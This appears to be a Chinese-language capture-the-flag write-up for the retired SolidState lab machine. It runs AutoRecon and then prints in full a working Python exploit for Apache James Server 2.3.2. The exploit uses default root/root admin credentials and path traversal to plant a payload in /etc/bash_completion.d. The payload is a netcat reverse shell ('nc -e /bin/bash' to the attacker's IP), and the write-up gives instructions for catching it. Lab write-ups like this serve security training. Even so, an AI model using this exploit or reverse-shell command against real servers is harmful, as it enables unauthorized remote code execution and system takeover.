本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.51
本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描
执行命令
autorecon 10.10.10.51 -o ./solidstate-autorecon
发现开放了4555端口,对应的服务是jame-admin 存在远程代码执行漏洞
对应exploit代码:https://www.exploit-db.com/exploits/35513
#!/usr/bin/python # # Exploit Title: Apache James Server 2.3.2 Authenticated User Remote Command Execution # Date: 16102014 # Exploit Author: Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec # Vendor Homepage: http://james.apache.org/server/ # Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip # Version: Apache James Server 2.3.2 # Tested on: Ubuntu, Debian # Info: This exploit works on default installation of Apache James Server 2.3.2 # Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d import socket import sys import time # specify payload #payload = 'touch /tmp/proof.txt' # to exploit on any user #payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # to exploit only on root payload = 'nc -e /bin/bash 10.10.14.5 8833' # to exploit only on root # credentials to James Remote Administration Tool (Default - root/root) user = 'root' pwd = 'root' if len(sys.argv) != 2: sys.stderr.write("[-]Usage: python %s <ip> " % sys.argv[0]) sys.stderr.write("[-]Exemple: python %s 127.0.0.1 " % sys.argv[0]) sys.exit(1) ip = sys.argv[1] def recv(s): s.recv(1024) time.sleep(0.2) try: print "[+]Connecting to James Remote Administration Tool..." s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((ip,4555)) s.recv(1024) s.send(user + " ") s.recv(1024) s.send(pwd + " ") s.recv(1024) print "[+]Creating user..." s.send("adduser ../../../../../../../../etc/bash_completion.d exploit ") s.recv(1024) s.send("quit ") s.close() print "[+]Connecting to James SMTP server..." s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((ip,25)) s.send("ehlo team@team.pl ") recv(s) print "[+]Sending payload..." s.send("mail from: <'@team.pl> ") recv(s) # also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname> ") if the recipient cannot be found s.send("rcpt to: <../../../../../../../../etc/bash_completion.d> ") recv(s) s.send("data ") recv(s) s.send("From: team@team.pl ") s.send(" ") s.send("' ") s.send(payload + " ") s.send(" . ") recv(s) s.send("quit ") recv(s) s.close() print "[+]Done! Payload will be executed once somebody logs in." except: print "Connection failed."
利用方式:
对应的exploit需要更改的就是payload更改为: 'nc -e /bin/bash 10.10.14.5 8833' 然后本地kali监听端口8833
执行:python 35513.py 10.10.10.51
等待nc成功接收的反弹shell即可
此靶机跟我之前做的vulnhub是一模一样,对应的手动操作链接:https://www.cnblogs.com/autopwn/p/13809602.html